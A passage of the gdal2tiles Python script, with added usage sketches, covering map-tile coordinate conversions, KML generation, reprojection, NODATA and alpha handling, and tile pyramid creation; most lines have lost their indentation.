"Maximal scaledown zoom of the pyramid closest to the pixelSize."
for i in range(MAXZOOMLEVEL):
if pixelSize > self.Resolution(i):
return max(0, i - 1) # We don't want to scale up
return MAXZOOMLEVEL - 1
def GoogleTile(self, tx, ty, zoom):
"Converts TMS tile coordinates to Google Tile coordinates"
# coordinate origin is moved from bottom-left to top-left corner of the extent
return tx, (2**zoom - 1) - ty
def QuadTree(self, tx, ty, zoom):
"Converts TMS tile coordinates to Microsoft QuadTree"
quadKey = ""
ty = (2**zoom - 1) - ty
for i in range(zoom, 0, -1):
digit = 0
mask = 1 << (i - 1)
if (tx & mask) != 0:
digit += 1
if (ty & mask) != 0:
digit += 2
quadKey += str(digit)
return quadKey
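# Illustrative usage sketch (not part of gdal2tiles): convert a WGS84 point to its
# TMS tile, then express that same tile in the Google/XYZ and Bing QuadTree schemes.
# The sample coordinates and zoom level are arbitrary.
def _demo_global_mercator(lat=47.0, lon=8.0, zoom=10):
    mercator = GlobalMercator()
    mx, my = mercator.LatLonToMeters(lat, lon)        # EPSG:3857 meters
    tx, ty = mercator.MetersToTile(mx, my, zoom)      # TMS tile (bottom-left origin)
    google_tile = mercator.GoogleTile(tx, ty, zoom)   # same tile, y flipped
    quadkey = mercator.QuadTree(tx, ty, zoom)         # same tile, Bing-style key
    return (tx, ty), google_tile, quadkey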
class GlobalGeodetic(object):
r"""
TMS Global Geodetic Profile
---------------------------
Functions necessary for generation of global tiles in Plate Carre projection,
EPSG:4326, "unprojected profile".
Such tiles are compatible with Google Earth (as any other EPSG:4326 rasters)
and you can overlay the tiles on top of OpenLayers base map.
Pixel and tile coordinates are in TMS notation (origin [0,0] in bottom-left).
What coordinate conversions do we need for TMS Global Geodetic tiles?
Global Geodetic tiles are using geodetic coordinates (latitude,longitude)
directly as planar coordinates XY (it is also called Unprojected or Plate
Carre). We need only scaling to pixel pyramid and cutting to tiles.
Pyramid has on top level two tiles, so it is not square but rectangle.
Area [-180,-90,180,90] is scaled to 512x256 pixels.
TMS has coordinate origin (for pixels and tiles) in bottom-left corner.
Rasters are in EPSG:4326 and therefore are compatible with Google Earth.
LatLon <-> Pixels <-> Tiles
WGS84 coordinates Pixels in pyramid Tiles in pyramid
lat/lon XY pixels Z zoom XYZ from TMS
EPSG:4326
.----. ----
/ \ <-> /--------/ <-> TMS
\ / /--------------/
----- /--------------------/
WMS, KML Web Clients, Google Earth TileMapService
"""
def __init__(self, tmscompatible, tile_size=256):
self.tile_size = tile_size
if tmscompatible is not None:
# Defaults the resolution factor to 0.703125 (2 tiles @ level 0)
# Adhers to OSGeo TMS spec
# http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification#global-geodetic
self.resFact = 180.0 / self.tile_size
else:
# Defaults the resolution factor to 1.40625 (1 tile @ level 0)
# Adheres OpenLayers, MapProxy, etc default resolution for WMTS
self.resFact = 360.0 / self.tile_size
def LonLatToPixels(self, lon, lat, zoom):
"Converts lon/lat to pixel coordinates in given zoom of the EPSG:4326 pyramid"
res = self.resFact / 2**zoom
px = (180 + lon) / res
py = (90 + lat) / res
return px, py
def PixelsToTile(self, px, py):
"Returns coordinates of the tile covering region in pixel coordinates"
tx = int(math.ceil(px / float(self.tile_size)) - 1)
ty = int(math.ceil(py / float(self.tile_size)) - 1)
return tx, ty
def LonLatToTile(self, lon, lat, zoom):
"Returns the tile for zoom which covers given lon/lat coordinates"
px, py = self.LonLatToPixels(lon, lat, zoom)
return self.PixelsToTile(px, py)
def Resolution(self, zoom):
"Resolution (arc/pixel) for given zoom level (measured at Equator)"
return self.resFact / 2**zoom
def ZoomForPixelSize(self, pixelSize):
"Maximal scaledown zoom of the pyramid closest to the pixelSize."
for i in range(MAXZOOMLEVEL):
if pixelSize > self.Resolution(i):
return max(0, i - 1) # We don't want to scale up
return MAXZOOMLEVEL - 1
def TileBounds(self, tx, ty, zoom):
"Returns bounds of the given tile"
res = self.resFact / 2**zoom
return (
tx * self.tile_size * res - 180,
ty * self.tile_size * res - 90,
(tx + 1) * self.tile_size * res - 180,
(ty + 1) * self.tile_size * res - 90
)
def TileLatLonBounds(self, tx, ty, zoom):
"Returns bounds of the given tile in the SWNE form"
b = self.TileBounds(tx, ty, zoom)
return (b[1], b[0], b[3], b[2])
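# Minimal sketch (not part of gdal2tiles): which geodetic tile covers a lon/lat
# point, and its bounds, using the TMS-compatible two-tiles-at-zoom-0 layout.
def _demo_global_geodetic(lon=8.0, lat=47.0, zoom=5):
    geodetic = GlobalGeodetic(tmscompatible=True)
    tx, ty = geodetic.LonLatToTile(lon, lat, zoom)
    return (tx, ty), geodetic.TileLatLonBounds(tx, ty, zoom)  # (south, west, north, east)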
class Zoomify(object):
"""
Tiles compatible with the Zoomify viewer
----------------------------------------
"""
def __init__(self, width, height, tile_size=256, tileformat='jpg'):
"""Initialization of the Zoomify tile tree"""
self.tile_size = tile_size
self.tileformat = tileformat
imagesize = (width, height)
tiles = (math.ceil(width / tile_size), math.ceil(height / tile_size))
# Size (in tiles) for each tier of pyramid.
self.tierSizeInTiles = []
self.tierSizeInTiles.append(tiles)
# Image size in pixels for each pyramid tierself
self.tierImageSize = []
self.tierImageSize.append(imagesize)
while (imagesize[0] > tile_size or imagesize[1] > tile_size):
imagesize = (math.floor(imagesize[0] / 2), math.floor(imagesize[1] / 2))
tiles = (math.ceil(imagesize[0] / tile_size), math.ceil(imagesize[1] / tile_size))
self.tierSizeInTiles.append(tiles)
self.tierImageSize.append(imagesize)
self.tierSizeInTiles.reverse()
self.tierImageSize.reverse()
# Depth of the Zoomify pyramid, number of tiers (zoom levels)
self.numberOfTiers = len(self.tierSizeInTiles)
# Number of tiles up to the given tier of pyramid.
        self.tileCountUpToTier = [0]
for i in range(1, self.numberOfTiers + 1):
self.tileCountUpToTier.append(
self.tierSizeInTiles[i - 1][0] * self.tierSizeInTiles[i - 1][1] +
self.tileCountUpToTier[i - 1]
)
def tilefilename(self, x, y, z):
"""Returns filename for tile with given coordinates"""
tileIndex = x + y * self.tierSizeInTiles[z][0] + self.tileCountUpToTier[z]
return os.path.join("TileGroup%.0f" % math.floor(tileIndex / 256),
"%s-%s-%s.%s" % (z, x, y, self.tileformat))
class GDALError(Exception):
pass
def exit_with_error(message, details=""):
# Message printing and exit code kept from the way it worked using the OptionParser (in case
# someone parses the error output)
sys.stderr.write("Usage: gdal2tiles.py [options] input_file [output]\n\n")
sys.stderr.write("gdal2tiles.py: error: %s\n" % message)
if details:
sys.stderr.write("\n\n%s\n" % details)
sys.exit(2)
def set_cache_max(cache_in_bytes):
# We set the maximum using `SetCacheMax` and `GDAL_CACHEMAX` to support both fork and spawn as multiprocessing start methods.
# https://github.com/OSGeo/gdal/pull/2112
os.environ['GDAL_CACHEMAX'] = '%d' % int(cache_in_bytes / 1024 / 1024)
gdal.SetCacheMax(cache_in_bytes)
def generate_kml(tx, ty, tz, tileext, tile_size, tileswne, options, children=None, **args):
"""
Template for the KML. Returns filled string.
"""
if not children:
children = []
args['tx'], args['ty'], args['tz'] = tx, ty, tz
args['tileformat'] = tileext
if 'tile_size' not in args:
args['tile_size'] = tile_size
if 'minlodpixels' not in args:
args['minlodpixels'] = int(args['tile_size'] / 2)
if 'maxlodpixels' not in args:
args['maxlodpixels'] = int(args['tile_size'] * 8)
if children == []:
args['maxlodpixels'] = -1
if tx is None:
tilekml = False
args['title'] = options.title
else:
tilekml = True
args['realtiley'] = GDAL2Tiles.getYTile(ty, tz, options)
args['title'] = "%d/%d/%d.kml" % (tz, tx, args['realtiley'])
args['south'], args['west'], args['north'], args['east'] = tileswne(tx, ty, tz)
if tx == 0:
args['drawOrder'] = 2 * tz + 1
elif tx is not None:
args['drawOrder'] = 2 * tz
else:
args['drawOrder'] = 0
url = options.url
if not url:
if tilekml:
url = "../../"
else:
url = ""
s = """<?xml version="1.0" encoding="utf-8"?>
<kml xmlns="http://www.opengis.net/kml/2.2">
<Document>
<name>%(title)s</name>
<description></description>
<Style>
<ListStyle id="hideChildren">
<listItemType>checkHideChildren</listItemType>
</ListStyle>
</Style>""" % args
if tilekml:
s += """
<Region>
<LatLonAltBox>
<north>%(north).14f</north>
<south>%(south).14f</south>
<east>%(east).14f</east>
<west>%(west).14f</west>
</LatLonAltBox>
<Lod>
<minLodPixels>%(minlodpixels)d</minLodPixels>
<maxLodPixels>%(maxlodpixels)d</maxLodPixels>
</Lod>
</Region>
<GroundOverlay>
<drawOrder>%(drawOrder)d</drawOrder>
<Icon>
<href>%(realtiley)d.%(tileformat)s</href>
</Icon>
<LatLonBox>
<north>%(north).14f</north>
<south>%(south).14f</south>
<east>%(east).14f</east>
<west>%(west).14f</west>
</LatLonBox>
</GroundOverlay>
""" % args
for cx, cy, cz in children:
csouth, cwest, cnorth, ceast = tileswne(cx, cy, cz)
ytile = GDAL2Tiles.getYTile(cy, cz, options)
s += """
<NetworkLink>
<name>%d/%d/%d.%s</name>
<Region>
<LatLonAltBox>
<north>%.14f</north>
<south>%.14f</south>
<east>%.14f</east>
<west>%.14f</west>
</LatLonAltBox>
<Lod>
<minLodPixels>%d</minLodPixels>
<maxLodPixels>-1</maxLodPixels>
</Lod>
</Region>
<Link>
<href>%s%d/%d/%d.kml</href>
<viewRefreshMode>onRegion</viewRefreshMode>
<viewFormat/>
</Link>
</NetworkLink>
""" % (cz, cx, ytile, args['tileformat'], cnorth, csouth, ceast, cwest,
args['minlodpixels'], url, cz, cx, ytile)
s += """ </Document>
</kml>
"""
return s
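# Example usage (illustrative sketch): render the KML for one mercator tile, assuming
# `options` comes from optparse_init() and `mercator` is a GlobalMercator instance.
# kml_text = generate_kml(tx=0, ty=0, tz=1, tileext='png', tile_size=256,
#                         tileswne=mercator.TileLatLonBounds, options=options,
#                         children=[(0, 0, 2), (1, 0, 2)])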
def scale_query_to_tile(dsquery, dstile, tiledriver, options, tilefilename=''):
"""Scales down query dataset to the tile dataset"""
querysize = dsquery.RasterXSize
tile_size = dstile.RasterXSize
tilebands = dstile.RasterCount
if options.resampling == 'average':
# Function: gdal.RegenerateOverview()
for i in range(1, tilebands + 1):
# Black border around NODATA
res = gdal.RegenerateOverview(dsquery.GetRasterBand(i), dstile.GetRasterBand(i),
'average')
if res != 0:
exit_with_error("RegenerateOverview() failed on %s, error %d" % (
tilefilename, res))
elif options.resampling == 'antialias' and numpy_available:
# Scaling by PIL (Python Imaging Library) - improved Lanczos
array = numpy.zeros((querysize, querysize, tilebands), numpy.uint8)
for i in range(tilebands):
array[:, :, i] = gdalarray.BandReadAsArray(dsquery.GetRasterBand(i + 1),
0, 0, querysize, querysize)
im = Image.fromarray(array, 'RGBA') # Always four bands
im1 = im.resize((tile_size, tile_size), Image.ANTIALIAS)
if os.path.exists(tilefilename):
im0 = Image.open(tilefilename)
im1 = Image.composite(im1, im0, im1)
im1.save(tilefilename, tiledriver)
else:
if options.resampling == 'near':
gdal_resampling = gdal.GRA_NearestNeighbour
elif options.resampling == 'bilinear':
gdal_resampling = gdal.GRA_Bilinear
elif options.resampling == 'cubic':
gdal_resampling = gdal.GRA_Cubic
elif options.resampling == 'cubicspline':
gdal_resampling = gdal.GRA_CubicSpline
elif options.resampling == 'lanczos':
gdal_resampling = gdal.GRA_Lanczos
elif options.resampling == 'mode':
gdal_resampling = gdal.GRA_Mode
elif options.resampling == 'max':
gdal_resampling = gdal.GRA_Max
elif options.resampling == 'min':
gdal_resampling = gdal.GRA_Min
elif options.resampling == 'med':
gdal_resampling = gdal.GRA_Med
elif options.resampling == 'q1':
gdal_resampling = gdal.GRA_Q1
elif options.resampling == 'q3':
gdal_resampling = gdal.GRA_Q3
# Other algorithms are implemented by gdal.ReprojectImage().
dsquery.SetGeoTransform((0.0, tile_size / float(querysize), 0.0, 0.0, 0.0,
tile_size / float(querysize)))
dstile.SetGeoTransform((0.0, 1.0, 0.0, 0.0, 0.0, 1.0))
res = gdal.ReprojectImage(dsquery, dstile, None, None, gdal_resampling)
if res != 0:
exit_with_error("ReprojectImage() failed on %s, error %d" % (tilefilename, res))
def setup_no_data_values(input_dataset, options):
"""
Extract the NODATA values from the dataset or use the passed arguments as override if any
"""
in_nodata = []
if options.srcnodata:
nds = list(map(float, options.srcnodata.split(',')))
if len(nds) < input_dataset.RasterCount:
in_nodata = (nds * input_dataset.RasterCount)[:input_dataset.RasterCount]
else:
in_nodata = nds
else:
for i in range(1, input_dataset.RasterCount + 1):
band = input_dataset.GetRasterBand(i)
raster_no_data = band.GetNoDataValue()
if raster_no_data is not None:
# Ignore nodata values that are not in the range of the band data type (see https://github.com/OSGeo/gdal/pull/2299)
if band.DataType == gdal.GDT_Byte and (raster_no_data != int(raster_no_data) or raster_no_data < 0 or raster_no_data > 255):
# We should possibly do similar check for other data types
in_nodata = []
break
in_nodata.append(raster_no_data)
if options.verbose:
print("NODATA: %s" % in_nodata)
return in_nodata
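# Example (illustrative): with --srcnodata=0,0,0 the override is used as-is for a
# 3-band dataset; without it, each band's GetNoDataValue() is collected instead.
# ds = gdal.Open('input.tif', gdal.GA_ReadOnly)   # hypothetical input file
# in_nodata = setup_no_data_values(ds, options)   # e.g. [0.0, 0.0, 0.0]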
def setup_input_srs(input_dataset, options):
"""
Determines and returns the Input Spatial Reference System (SRS) as an osr object and as a
WKT representation
Uses in priority the one passed in the command line arguments. If None, tries to extract them
from the input dataset
"""
input_srs = None
input_srs_wkt = None
if options.s_srs:
input_srs = osr.SpatialReference()
input_srs.SetFromUserInput(options.s_srs)
input_srs_wkt = input_srs.ExportToWkt()
else:
input_srs_wkt = input_dataset.GetProjection()
if not input_srs_wkt and input_dataset.GetGCPCount() != 0:
input_srs_wkt = input_dataset.GetGCPProjection()
if input_srs_wkt:
input_srs = osr.SpatialReference()
input_srs.ImportFromWkt(input_srs_wkt)
if input_srs is not None:
input_srs.SetAxisMappingStrategy(osr.OAMS_TRADITIONAL_GIS_ORDER)
return input_srs, input_srs_wkt
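# Example (illustrative): an explicit --s_srs wins over the projection stored in the
# dataset; the returned tuple is an osr.SpatialReference plus its WKT string.
# options.s_srs = 'EPSG:32633'                    # hypothetical UTM zone 33N source
# in_srs, in_srs_wkt = setup_input_srs(ds, options)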
def setup_output_srs(input_srs, options):
"""
Setup the desired SRS (based on options)
"""
output_srs = osr.SpatialReference()
if options.profile == 'mercator':
output_srs.ImportFromEPSG(3857)
elif options.profile == 'geodetic':
output_srs.ImportFromEPSG(4326)
elif options.profile == 'raster':
output_srs = input_srs
else:
output_srs = tmsMap[options.profile].srs.Clone()
if output_srs:
output_srs.SetAxisMappingStrategy(osr.OAMS_TRADITIONAL_GIS_ORDER)
return output_srs
def has_georeference(dataset):
return (dataset.GetGeoTransform() != (0.0, 1.0, 0.0, 0.0, 0.0, 1.0) or
dataset.GetGCPCount() != 0)
def reproject_dataset(from_dataset, from_srs, to_srs, options=None):
"""
Returns the input dataset in the expected "destination" SRS.
If the dataset is already in the correct SRS, returns it unmodified
"""
if not from_srs or not to_srs:
raise GDALError("from and to SRS must be defined to reproject the dataset")
if (from_srs.ExportToProj4() != to_srs.ExportToProj4()) or (from_dataset.GetGCPCount() != 0):
if from_srs.IsGeographic() and to_srs.GetAuthorityName(None) == 'EPSG' and to_srs.GetAuthorityCode(None) == '3857':
from_gt = from_dataset.GetGeoTransform(can_return_null=True)
if from_gt and from_gt[2] == 0 and from_gt[4] == 0 and from_gt[5] < 0:
maxlat = from_gt[3]
minlat = from_gt[3] + from_dataset.RasterYSize * from_gt[5]
MAX_LAT = 85.0511287798066
adjustBounds = False
if maxlat > MAX_LAT:
maxlat = MAX_LAT
adjustBounds = True
if minlat < -MAX_LAT:
minlat = -MAX_LAT
adjustBounds = True
if adjustBounds:
ct = osr.CoordinateTransformation(from_srs, to_srs)
west, south = ct.TransformPoint(from_gt[0], minlat)[:2]
east, north = ct.TransformPoint(from_gt[0] + from_dataset.RasterXSize * from_gt[1], maxlat)[:2]
return gdal.Warp("", from_dataset, format='VRT', outputBounds = [west, south, east, north], dstSRS = 'EPSG:3857')
to_dataset = gdal.AutoCreateWarpedVRT(from_dataset,
from_srs.ExportToWkt(), to_srs.ExportToWkt())
if options and options.verbose:
print("Warping of the raster by AutoCreateWarpedVRT (result saved into 'tiles.vrt')")
to_dataset.GetDriver().CreateCopy("tiles.vrt", to_dataset)
return to_dataset
else:
return from_dataset
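# Example (illustrative): warp a geographic (EPSG:4326) dataset into the Web Mercator
# SRS used by the 'mercator' profile; the result is a warped VRT, not a copy on disk.
# src_srs = osr.SpatialReference(); src_srs.ImportFromEPSG(4326)
# dst_srs = osr.SpatialReference(); dst_srs.ImportFromEPSG(3857)
# warped_ds = reproject_dataset(ds, src_srs, dst_srs)   # ds: hypothetical dataset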
def add_gdal_warp_options_to_string(vrt_string, warp_options):
if not warp_options:
return vrt_string
vrt_root = ElementTree.fromstring(vrt_string)
options = vrt_root.find("GDALWarpOptions")
if options is None:
return vrt_string
for key, value in warp_options.items():
tb = ElementTree.TreeBuilder()
tb.start("Option", {"name": key})
tb.data(value)
tb.end("Option")
elem = tb.close()
options.insert(0, elem)
return ElementTree.tostring(vrt_root).decode()
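# Example (illustrative): inject extra warp options into the XML of a warped VRT,
# the same way update_no_data_values() below prepares its NODATA handling.
# vrt_xml = warped_ds.GetMetadata('xml:VRT')[0]   # hypothetical warped VRT dataset
# vrt_xml = add_gdal_warp_options_to_string(vrt_xml, {'INIT_DEST': 'NO_DATA'})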
def update_no_data_values(warped_vrt_dataset, nodata_values, options=None):
"""
Takes an array of NODATA values and forces them on the WarpedVRT file dataset passed
"""
# TODO: gbataille - Seems that I forgot tests there
assert nodata_values != []
vrt_string = warped_vrt_dataset.GetMetadata("xml:VRT")[0]
vrt_string = add_gdal_warp_options_to_string(
vrt_string, {"INIT_DEST": "NO_DATA", "UNIFIED_SRC_NODATA": "YES"})
# TODO: gbataille - check the need for this replacement. Seems to work without
# # replace BandMapping tag for NODATA bands....
# for i in range(len(nodata_values)):
# s = s.replace(
# '<BandMapping src="%i" dst="%i"/>' % ((i+1), (i+1)),
# """
# <BandMapping src="%i" dst="%i">
# <SrcNoDataReal>%i</SrcNoDataReal>
# <SrcNoDataImag>0</SrcNoDataImag>
# <DstNoDataReal>%i</DstNoDataReal>
# <DstNoDataImag>0</DstNoDataImag>
# </BandMapping>
# """ % ((i+1), (i+1), nodata_values[i], nodata_values[i]))
corrected_dataset = gdal.Open(vrt_string)
# set NODATA_VALUE metadata
corrected_dataset.SetMetadataItem(
'NODATA_VALUES', ' '.join([str(i) for i in nodata_values]))
if options and options.verbose:
print("Modified warping result saved into 'tiles1.vrt'")
with open("tiles1.vrt", "w") as f:
f.write(corrected_dataset.GetMetadata("xml:VRT")[0])
return corrected_dataset
def add_alpha_band_to_string_vrt(vrt_string):
# TODO: gbataille - Old code speak of this being equivalent to gdalwarp -dstalpha
# To be checked
vrt_root = ElementTree.fromstring(vrt_string)
index = 0
nb_bands = 0
for subelem in list(vrt_root):
if subelem.tag == "VRTRasterBand":
nb_bands += 1
color_node = subelem.find("./ColorInterp")
if color_node is not None and color_node.text == "Alpha":
raise Exception("Alpha band already present")
else:
if nb_bands:
# This means that we are one element after the Band definitions
break
index += 1
tb = ElementTree.TreeBuilder()
tb.start("VRTRasterBand",
{'dataType': "Byte", "band": str(nb_bands + 1), "subClass": "VRTWarpedRasterBand"})
tb.start("ColorInterp", {})
tb.data("Alpha")
tb.end("ColorInterp")
tb.end("VRTRasterBand")
elem = tb.close()
vrt_root.insert(index, elem)
warp_options = vrt_root.find(".//GDALWarpOptions")
tb = ElementTree.TreeBuilder()
tb.start("DstAlphaBand", {})
tb.data(str(nb_bands + 1))
tb.end("DstAlphaBand")
elem = tb.close()
warp_options.append(elem)
# TODO: gbataille - this is a GDALWarpOptions. Why put it in a specific place?
tb = ElementTree.TreeBuilder()
tb.start("Option", {"name": "INIT_DEST"})
tb.data("0")
tb.end("Option")
elem = tb.close()
warp_options.append(elem)
return ElementTree.tostring(vrt_root).decode()
def update_alpha_value_for_non_alpha_inputs(warped_vrt_dataset, options=None):
"""
Handles datasets with 1 or 3 bands, i.e. without an alpha channel, in case the nodata
value has not been forced by options
"""
if warped_vrt_dataset.RasterCount in [1, 3]:
vrt_string = warped_vrt_dataset.GetMetadata("xml:VRT")[0]
vrt_string = add_alpha_band_to_string_vrt(vrt_string)
warped_vrt_dataset = gdal.Open(vrt_string)
if options and options.verbose:
print("Modified -dstalpha warping result saved into 'tiles1.vrt'")
with open("tiles1.vrt", "w") as f:
f.write(warped_vrt_dataset.GetMetadata("xml:VRT")[0])
return warped_vrt_dataset
def nb_data_bands(dataset):
"""
Return the number of data (non-alpha) bands of a gdal dataset
"""
alphaband = dataset.GetRasterBand(1).GetMaskBand()
if ((alphaband.GetMaskFlags() & gdal.GMF_ALPHA) or
dataset.RasterCount == 4 or
dataset.RasterCount == 2):
return dataset.RasterCount - 1
return dataset.RasterCount
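# Example (illustrative): an RGBA GeoTIFF reports RasterCount == 4 but only 3 data
# bands, because the alpha band is not counted.
# print(nb_data_bands(gdal.Open('rgba.tif')))     # hypothetical file -> 3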
def create_base_tile(tile_job_info, tile_detail):
dataBandsCount = tile_job_info.nb_data_bands
output = tile_job_info.output_file_path
tileext = tile_job_info.tile_extension
tile_size = tile_job_info.tile_size
options = tile_job_info.options
tilebands = dataBandsCount + 1
cached_ds = getattr(threadLocal, 'cached_ds', None)
if cached_ds and cached_ds.GetDescription() == tile_job_info.src_file:
ds = cached_ds
else:
ds = gdal.Open(tile_job_info.src_file, gdal.GA_ReadOnly)
threadLocal.cached_ds = ds
mem_drv = gdal.GetDriverByName('MEM')
out_drv = gdal.GetDriverByName(tile_job_info.tile_driver)
alphaband = ds.GetRasterBand(1).GetMaskBand()
tx = tile_detail.tx
ty = tile_detail.ty
tz = tile_detail.tz
rx = tile_detail.rx
ry = tile_detail.ry
rxsize = tile_detail.rxsize
rysize = tile_detail.rysize
wx = tile_detail.wx
wy = tile_detail.wy
wxsize = tile_detail.wxsize
wysize = tile_detail.wysize
querysize = tile_detail.querysize
# Tile dataset in memory
tilefilename = os.path.join(
output, str(tz), str(tx), "%s.%s" % (ty, tileext))
dstile = mem_drv.Create('', tile_size, tile_size, tilebands)
data = alpha = None
if options.verbose:
print("\tReadRaster Extent: ",
(rx, ry, rxsize, rysize), (wx, wy, wxsize, wysize))
# The query is done in 'nearest neighbour' mode but can be bigger than the tile_size.
# We scale the query down to the tile_size with the supplied resampling algorithm.
if rxsize != 0 and rysize != 0 and wxsize != 0 and wysize != 0:
alpha = alphaband.ReadRaster(rx, ry, rxsize, rysize, wxsize, wysize)
# Detect totally transparent tile and skip its creation
if tile_job_info.exclude_transparent and len(alpha) == alpha.count('\x00'.encode('ascii')):
return
data = ds.ReadRaster(rx, ry, rxsize, rysize, wxsize, wysize,
band_list=list(range(1, dataBandsCount + 1)))
# The tile in memory is a transparent file by default. Write pixel values into it if
# any
if data:
if tile_size == querysize:
# Use the ReadRaster result directly in tiles ('nearest neighbour' query)
dstile.WriteRaster(wx, wy, wxsize, wysize, data,
band_list=list(range(1, dataBandsCount + 1)))
dstile.WriteRaster(wx, wy, wxsize, wysize, alpha, band_list=[tilebands])
# Note: For source drivers based on wavelet compression (JPEG2000, ECW,
# MrSID) the ReadRaster function returns a high-quality raster (not ugly
# nearest neighbour)
# TODO: Use 'near' directly for wavelet-compressed files
else:
# Big ReadRaster query in memory, scaled to the tile_size - used by all
# algorithms except 'near'
dsquery = mem_drv.Create('', querysize, querysize, tilebands)
# TODO: fill the null value in case a tile without alpha is produced (now
# only png tiles are supported)
dsquery.WriteRaster(wx, wy, wxsize, wysize, data,
band_list=list(range(1, dataBandsCount + 1)))
dsquery.WriteRaster(wx, wy, wxsize, wysize, alpha, band_list=[tilebands])
scale_query_to_tile(dsquery, dstile, tile_job_info.tile_driver, options,
tilefilename=tilefilename)
del dsquery
del data
if options.resampling != 'antialias':
# Write a copy of tile to png/jpg
out_drv.CreateCopy(tilefilename, dstile, strict=0)
del dstile
# Create a KML file for this tile.
if tile_job_info.kml:
swne = get_tile_swne(tile_job_info, options)
if swne is not None:
kmlfilename = os.path.join(output, str(tz), str(tx), '%d.kml' % GDAL2Tiles.getYTile(ty, tz, options))
if not options.resume or not os.path.exists(kmlfilename):
with open(kmlfilename, 'wb') as f:
f.write(generate_kml(
tx, ty, tz, tile_job_info.tile_extension, tile_job_info.tile_size,
swne, tile_job_info.options
).encode('utf-8'))
def create_overview_tiles(tile_job_info, output_folder, options):
"""Generation of the overview tiles (higher in the pyramid) based on existing tiles"""
mem_driver = gdal.GetDriverByName('MEM')
tile_driver = tile_job_info.tile_driver
out_driver = gdal.GetDriverByName(tile_driver)
tilebands = tile_job_info.nb_data_bands + 1
# Usage of existing tiles: from 4 underlying tiles generate one as overview.
tcount = 0
for tz in range(tile_job_info.tmaxz - 1, tile_job_info.tminz - 1, -1):
tminx, tminy, tmaxx, tmaxy = tile_job_info.tminmax[tz]
tcount += (1 + abs(tmaxx - tminx)) * (1 + abs(tmaxy - tminy))
ti = 0
if tcount == 0:
return
if not options.quiet:
print("Generating Overview Tiles:")
progress_bar = ProgressBar(tcount)
progress_bar.start()
for tz in range(tile_job_info.tmaxz - 1, tile_job_info.tminz - 1, -1):
tminx, tminy, tmaxx, tmaxy = tile_job_info.tminmax[tz]
for ty in range(tmaxy, tminy - 1, -1):
for tx in range(tminx, tmaxx + 1):
ti += 1
ytile = GDAL2Tiles.getYTile(ty, tz, options)
tilefilename = os.path.join(output_folder,
str(tz),
str(tx),
"%s.%s" % (ytile, tile_job_info.tile_extension))
if options.verbose:
print(ti, '/', tcount, tilefilename)
if options.resume and os.path.exists(tilefilename):
if options.verbose:
print("Tile generation skipped because of --resume")
else:
progress_bar.log_progress()
continue
# Create directories for the tile
if not os.path.exists(os.path.dirname(tilefilename)):
os.makedirs(os.path.dirname(tilefilename))
dsquery = mem_driver.Create('', 2 * tile_job_info.tile_size,
2 * tile_job_info.tile_size, tilebands)
# TODO: fill the null value
dstile = mem_driver.Create('', tile_job_info.tile_size, tile_job_info.tile_size,
tilebands)
# TODO: Implement more clever walking on the tiles with cache functionality
# probably walk should start with reading of four tiles from top left corner
# Hilbert curve
children = []
# Read the tiles and write them to query window
for y in range(2 * ty, 2 * ty + 2):
for x in range(2 * tx, 2 * tx + 2):
minx, miny, maxx, maxy = tile_job_info.tminmax[tz + 1]
if x >= minx and x <= maxx and y >= miny and y <= maxy:
ytile2 = GDAL2Tiles.getYTile(y, tz+1, options)
base_tile_path = os.path.join(output_folder, str(tz + 1), str(x),
"%s.%s" % (ytile2, tile_job_info.tile_extension))
if not os.path.isfile(base_tile_path):
continue
dsquerytile = gdal.Open(
base_tile_path,
gdal.GA_ReadOnly)
if x == 2*tx:
tileposx = 0
else:
tileposx = tile_job_info.tile_size
if options.xyz and options.profile == 'raster':
if y == 2*ty:
tileposy = 0
else:
tileposy = tile_job_info.tile_size
else:
if y == 2*ty:
tileposy = tile_job_info.tile_size
else:
tileposy = 0
dsquery.WriteRaster(
tileposx, tileposy, tile_job_info.tile_size,
tile_job_info.tile_size,
dsquerytile.ReadRaster(0, 0,
tile_job_info.tile_size,
tile_job_info.tile_size),
band_list=list(range(1, tilebands + 1)))
children.append([x, y, tz + 1])
if children:
scale_query_to_tile(dsquery, dstile, tile_driver, options,
tilefilename=tilefilename)
# Write a copy of tile to png/jpg
if options.resampling != 'antialias':
# Write a copy of tile to png/jpg
out_driver.CreateCopy(tilefilename, dstile, strict=0)
if options.verbose:
print("\tbuild from zoom", tz + 1,
" tiles:", (2 * tx, 2 * ty), (2 * tx + 1, 2 * ty),
(2 * tx, 2 * ty + 1), (2 * tx + 1, 2 * ty + 1))
# Create a KML file for this tile.
if tile_job_info.kml:
swne = get_tile_swne(tile_job_info, options)
if swne is not None:
with open(os.path.join(
output_folder,
'%d/%d/%d.kml' % (tz, tx, ytile)
), 'wb') as f:
f.write(generate_kml(
tx, ty, tz, tile_job_info.tile_extension, tile_job_info.tile_size,
swne, options, children
).encode('utf-8'))
if not options.verbose and not options.quiet:
progress_bar.log_progress()
def optparse_init():
"""Prepare the option parser for input (argv)"""
from optparse import OptionParser, OptionGroup
usage = "Usage: %prog [options] input_file [output]"
p = OptionParser(usage, version="%prog " + __version__)
p.add_option("-p", "--profile", dest='profile',
type='choice', choices=profile_list,
help=("Tile cutting profile (%s) - default 'mercator' "
"(Google Maps compatible)" % ",".join(profile_list)))
p.add_option("-r", "--resampling", dest="resampling",
type='choice', choices=resampling_list,
help="Resampling method (%s) - default 'average'" % ",".join(resampling_list))
p.add_option('-s', '--s_srs', dest="s_srs", metavar="SRS",
help="The spatial reference system used for the source input data")
p.add_option('-z', '--zoom', dest="zoom",
help="Zoom levels to render (format:'2-5' or '10').")
p.add_option('-e', '--resume', dest="resume", action="store_true",
help="Resume mode. Generate only missing files.")
p.add_option('-a', '--srcnodata', dest="srcnodata", metavar="NODATA",
help="Value in the input dataset considered as transparent")
p.add_option('-d', '--tmscompatible', dest="tmscompatible", action="store_true",
help=("When using the geodetic profile, specifies the base resolution "
"as 0.703125 or 2 tiles at zoom level 0."))
p.add_option('--xyz',
action='store_true', dest='xyz',
help="Use XYZ tile numbering (OSM Slippy Map tiles) instead of TMS")
p.add_option("-v", "--verbose",
action="store_true", dest="verbose",
help="Print status messages to stdout")
p.add_option("-x", "--exclude",
action="store_true", dest="exclude_transparent",
help="Exclude transparent tiles from result tileset")
p.add_option("-q", "--quiet",
action="store_true", dest="quiet",
help="Disable messages and status to stdout")
p.add_option("--processes",
dest="nb_processes",
type='int',
help="Number of processes to use for tiling")
p.add_option("--tilesize", dest="tilesize", metavar="PIXELS", default=256,
type='int',
help="Width and height in pixel of a tile")
# KML options
g = OptionGroup(p, "KML (Google Earth) options",
